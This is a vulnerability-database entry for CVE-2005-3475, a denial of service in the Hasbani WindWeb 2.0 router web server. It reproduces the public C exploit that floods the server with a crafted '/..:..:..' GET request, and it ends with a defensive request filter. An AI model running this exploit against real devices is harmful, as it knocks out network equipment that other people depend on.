CVE-2005-3475
CVSS 5.0
Published: 2005-11-02 21:02:00
Revised: 2008-09-05 16:54:29

[Original] Hasbani Web Server (WindWeb) 2.0 allows remote attackers to cause a denial of service (infinite loop) via HTTP crafted GET requests.


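[CNNVD] Hasbani Web Server Malformed HTTP GET Request Remote Denial of Service Vulnerability (CNNVD-200511-100)

        Hasbani Web Server is a web server program.
        Hasbani Web Server (WindWeb) 2.0 allows remote attackers to cause a denial of service (infinite loop) via crafted HTTP GET requests.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interruptions in resource availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3475
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3475
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-100
(Official data source) CNNVD

- Other links and resources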

http://xforce.iss.net/xforce/xfdb/24657
(UNKNOWN)  XF  hasbani-get-dos(24657)
http://www.x0n3-h4ck.org/index.php?name=news&article=92
(UNKNOWN)  MISC  http://www.x0n3-h4ck.org/index.php?name=news&article=92
http://www.securityfocus.com/bid/15225
(UNKNOWN)  BID  15225
http://www.osvdb.org/20447
(UNKNOWN)  OSVDB  20447
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0572.html
(UNKNOWN)  FULLDISC  20051027 Hasbani-WindWeb/2.0 Remote DoS [ with exploit ]

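- Vulnerability information

Hasbani Web Server Malformed HTTP GET Request Remote Denial of Service Vulnerability
Medium severity; Other
2005-11-02 00:00:00 2006-09-05 00:00:00
Remote
        Hasbani Web Server is a web server program.
        Hasbani Web Server (WindWeb) 2.0 allows remote attackers to cause a denial of service (infinite loop) via crafted HTTP GET requests.

- Advisories and patches

        No data available

- Vulnerability information (1274)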

Hasbani-WindWeb/2.0 - HTTP GET Remote DoS (EDBID:1274)
hardware dos
2005-10-27 Verified
0 Expanders
/*
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
 >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   26\09\05    \/      |__|      \/     \/

[i] Title:              Hasbani-WindWeb/2.0 - HTTP GET  Remote DoS
[i] Discovered by:      Expanders
[i] Exploit by:         Expanders

[ What is Hasbani-WindWeb/2.0 ]

Hasbani server is a httpd created for managing ethernet routers and adsl modems.

[ Why HTTPD crash? ]

Causes of DoS are not perfectly known by me 'cos I can't debug a chip-integrated http daemon.
Btw seems that Hasbani enters a loop in a GET /..:..:..etc. condition, so that when an attacker requests a long crafted string
the server enters an endless loop with a consequent crash of the httpd.

NOTE: This exploit DOESN'T drop down victim's adsl connection!

[ Timeline ]

This vulnerability was not communicated because I didn't find Hasbani's vendor.

[ Links ]

www.x0n3-h4ck.org



*/

#include <stdio.h>
#include <stdlib.h>   /* exit, atoi, malloc, free */
#include <string.h>   /* memset, strlen */
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUGSTR "GET %s HTTP/1.0\n\n\n" // Command where bug reside


char evilrequest[] = {
0x2f, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x78, 0x30, 0x6e, 0x33, 
0x2d, 0x68, 0x34, 0x63, 0x6b, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e,
0x00 }; /* NUL terminator: the array is used with %s and strlen() below */

fd_set readfds;
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int banner() {
  printf("\n       _______         ________           .__        _____          __     \n");
  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
  printf("[i] Title:              \tHasbani-WindWeb/2.0 - HTTP GET  Remote DoS\n");
  printf("[i] Discovered by:      \tExpanders\n");
  printf("[i] Proof of concept by:\tExpanders\n\n");
  return 0;
}

int usage(char *filename) {
  printf("Usage: \t%s HOST <port>   ::   default HTTPD port: 80\n\n",filename);
  exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
  int s;
  struct sockaddr_in remote_addr;
  struct hostent* host_addr;

  memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
  if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
  {
   printf ( "[X] Cannot resolve \"%s\"\n", ip );
   exit ( 1 );
  }
  remote_addr.sin_family = AF_INET;
  remote_addr.sin_port = htons ( port );
  remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
  if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
  {
   printf ( "[X] Socket failed!\n" );
   exit(1);
  }
  if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
  {
   printf ( "[X] Failed connecting!\n" );
          exit(1);
  }
  return ( s );
}


int main(int argc, char *argv[]) {
    int s,n;
    unsigned int rcv;
    char *request;
    char recvbuf[256];
    banner();
    if( argc < 3)
        argv[2] = "80";
    else if ((atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534))
         usage(argv[0]);
    if( (argc < 2) )
        usage(argv[0]);
    request = (char *) malloc(1024);
    printf("[+] Connecting to remote host\n");
    s = remote_connect(argv[1],atoi(argv[2]));
    sleep(1);
    printf("[+] Creating buffer\n");
    sprintf(request,BUGSTR,evilrequest);
    printf("[+] Sending %zu bytes of painfull buffer\n",strlen(evilrequest));
    if ( send ( s, request, strlen (request), 0) <= 0 )
    {
            printf("[X] Failed to send buffer\n");
            close(s);
            exit(1);
    }
    sleep(1);
    printf("[+] Done, Packet Sent\n");
    close(s);
    free(request);
    request = NULL;
    return 0;
}		

- Vulnerability information

20447
Hasbani WindWeb Integrated Web Server Malformed GET Request DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability Solution Unknown
Exploit Public

- Vulnerability description

WindWeb Web Server contains a flaw that may allow a remote denial of service. The issue is triggered when requesting a specially crafted URL with many directory traversal characters, and will result in loss of availability for the service.

- Timeline

2005-10-27 Unknown
2005-10-27 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
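
The description above ties the hang to a request target made of many ".." segments in one long string. The following is an added example, not code from the vendor, the advisory or the exploit author: a request-line check that a filtering front end placed before the management interface could apply, untested against the device itself. The function name, the verdict names and both limits are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET_LEN 256 /* assumed cap on request-target length */
#define MAX_DOTDOT 2       /* assumed cap on ".." segments per target */

enum verdict { ALLOW, REJECT_MALFORMED, REJECT_LENGTH, REJECT_TRAVERSAL };

/* Classify one request line ("GET /path HTTP/1.0") in a single bounded pass.
 * Percent-encoded dots (%2e) are not decoded here. */
enum verdict check_request_line(const char *line, size_t len)
{
    const char *sp1 = memchr(line, ' ', len);
    if (sp1 == NULL)
        return REJECT_MALFORMED;
    const char *target = sp1 + 1;
    size_t rest = len - (size_t)(target - line);
    const char *sp2 = memchr(target, ' ', rest);
    size_t tlen = sp2 ? (size_t)(sp2 - target) : rest;
    while (tlen > 0 && (target[tlen - 1] == '\r' || target[tlen - 1] == '\n'))
        tlen--; /* HTTP/0.9-style line with no version token */
    if (tlen == 0 || target[0] != '/')
        return REJECT_MALFORMED;
    if (tlen > MAX_TARGET_LEN)
        return REJECT_LENGTH;

    size_t dotdot = 0, seg = 0; /* seg = start index of current segment */
    for (size_t i = 0; i <= tlen; i++) {
        if (i < tlen && target[i] != '/' && target[i] != ':' && target[i] != '\\')
            continue;
        /* a separator or the end of the target closes the segment [seg, i) */
        if (i - seg == 2 && target[seg] == '.' && target[seg + 1] == '.'
            && ++dotdot > MAX_DOTDOT)
            return REJECT_TRAVERSAL;
        seg = i + 1;
    }
    return ALLOW;
}

int main(void)
{
    /* Constructed sample request lines, not captured traffic. */
    const char *samples[] = { "GET /index.html HTTP/1.0\r\n",
                              "GET /a/../b.html HTTP/1.0\r\n",
                              "GET /..:..:..:..:.. HTTP/1.0\n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %s", check_request_line(samples[i], strlen(samples[i])), samples[i]);
    return 0;
}
```

The length cap is checked before the segment scan, so an oversized target is rejected without being walked at all.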

- Related references

- Vulnerability author
